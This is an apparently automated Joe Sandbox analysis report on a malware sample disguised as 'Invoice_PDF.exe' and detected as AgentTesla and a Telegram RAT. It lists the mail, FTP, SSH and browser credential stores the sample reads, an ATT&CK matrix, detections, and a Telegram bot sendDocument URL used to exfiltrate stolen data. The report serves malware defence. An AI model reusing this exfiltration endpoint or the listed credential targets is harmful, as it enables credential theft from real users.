                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Invoice_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4130420.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4219800.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4130420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4219800.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Invoice_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4130420.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4219800.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4130420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4219800.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Credentials in Registry1Security Software Discovery211Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Invoice_PDF.exe45%VirustotalBrowse
                      Invoice_PDF.exe49%MetadefenderBrowse
                      Invoice_PDF.exe62%ReversingLabsByteCode-MSIL.Backdoor.Androm
                      Invoice_PDF.exe100%AviraHEUR/AGEN.1141888

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.0.Invoice_PDF.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Invoice_PDF.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Invoice_PDF.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      3.2.Invoice_PDF.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Invoice_PDF.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Invoice_PDF.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://PHCGWf.com0%Avira URL Cloudsafe
                      http://www.fontbureau.comE80%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      https://api.telegram.org40%URL Reputationsafe
                      http://www.fontbureau.comoitu0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      https://87HMfkdDwCo1wEm.org0%Avira URL Cloudsafe
                      http://www.fontbureau.como0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.fontbureau.comgrito0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.chinhdo.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://87HMfkdDwCo1wEm.orgx0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.apache.org/licenses/LICENSE-2.0Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                		high
                                http://DynDns.comDynDNSInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/?Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.orgInvoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpfalse
                                    		high
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                      		high
                                      https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentdocument-----Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                        		high
                                        http://PHCGWf.comInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comE8Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tiro.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comlInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cTheInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.telegram.org4Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comoituInvoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://87HMfkdDwCo1wEm.orgInvoice_PDF.exe, 00000003.00000002.527180057.00000000035A0000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comoInvoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/DPleaseInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comgritoInvoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fonts.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://api.telegram.orgInvoice_PDF.exe, 00000003.00000002.527261346.00000000035B9000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.chinhdo.comInvoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInvoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.sakkal.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://87HMfkdDwCo1wEm.orgxInvoice_PDF.exe, 00000003.00000002.527027069.000000000354C000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipInvoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpfalse
                                                        		high

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        		api.telegram.orgUnited Kingdom
                                                        		62041TELEGRAMRUfalse

                                                        General Information

                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                        Analysis ID:532735
                                                        Start date:02.12.2021
                                                        Start time:16:53:42
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 9m 42s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:Invoice_PDF.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:23
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 0.3% (good quality ratio 0.1%)
                                                        • Quality average: 24.8%
                                                        • Quality standard deviation: 36.9%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        16:54:51API Interceptor701x Sleep call for process: Invoice_PDF.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        149.154.167.220SWIFT_ADVICE.exeGet hashmaliciousBrowse
                                                          Overdue outstanding payment.exeGet hashmaliciousBrowse
                                                            proforma invoice packing list.exeGet hashmaliciousBrowse
                                                              KG236KQE0b.exeGet hashmaliciousBrowse
                                                                TT COPY.exeGet hashmaliciousBrowse
                                                                  proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                    PROFORMA.EXEGet hashmaliciousBrowse
                                                                      Proforma-Invoice CAC1105 CI&PL.exeGet hashmaliciousBrowse
                                                                        8VVKoakLYt.exeGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exeGet hashmaliciousBrowse
                                                                            FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                              Quote.exeGet hashmaliciousBrowse
                                                                                Dhl delivery Express.exeGet hashmaliciousBrowse
                                                                                  stampa_CFS-ITALIA_1123311-655.exeGet hashmaliciousBrowse
                                                                                    Launcher.exeGet hashmaliciousBrowse
                                                                                      BANKASI 657090031.exeGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Barys.226418.1879.exeGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exeGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Trojan.SpyBot.1125.26781.exeGet hashmaliciousBrowse
                                                                                              Emailing Swift.exeGet hashmaliciousBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                api.telegram.orgNew Order4687334.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SWIFT_ADVICE.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Overdue outstanding payment.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                KG236KQE0b.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                TT COPY.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Invoice.doc.scr.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PROFORMA.EXEGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Proforma-Invoice CAC1105 CI&PL.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                8VVKoakLYt.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Quote.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Dhl delivery Express.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                stampa_CFS-ITALIA_1123311-655.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Launcher.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                BANKASI 657090031.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Variant.Barys.226418.1879.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                TELEGRAMRUSWIFT_ADVICE.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Overdue outstanding payment.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                KG236KQE0b.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                TT COPY.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PROFORMA.EXEGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Proforma-Invoice CAC1105 CI&PL.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                8VVKoakLYt.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                nkXzJnW7AH.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Quote.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Dhl delivery Express.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                stampa_CFS-ITALIA_1123311-655.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Launcher.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                BANKASI 657090031.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Variant.Barys.226418.1879.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.SpyBot.1125.26781.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eAegEywmjUJ.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                3t9XLLs9ae.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                mzSVrYKRrI.exeGet hashmaliciousBrowse
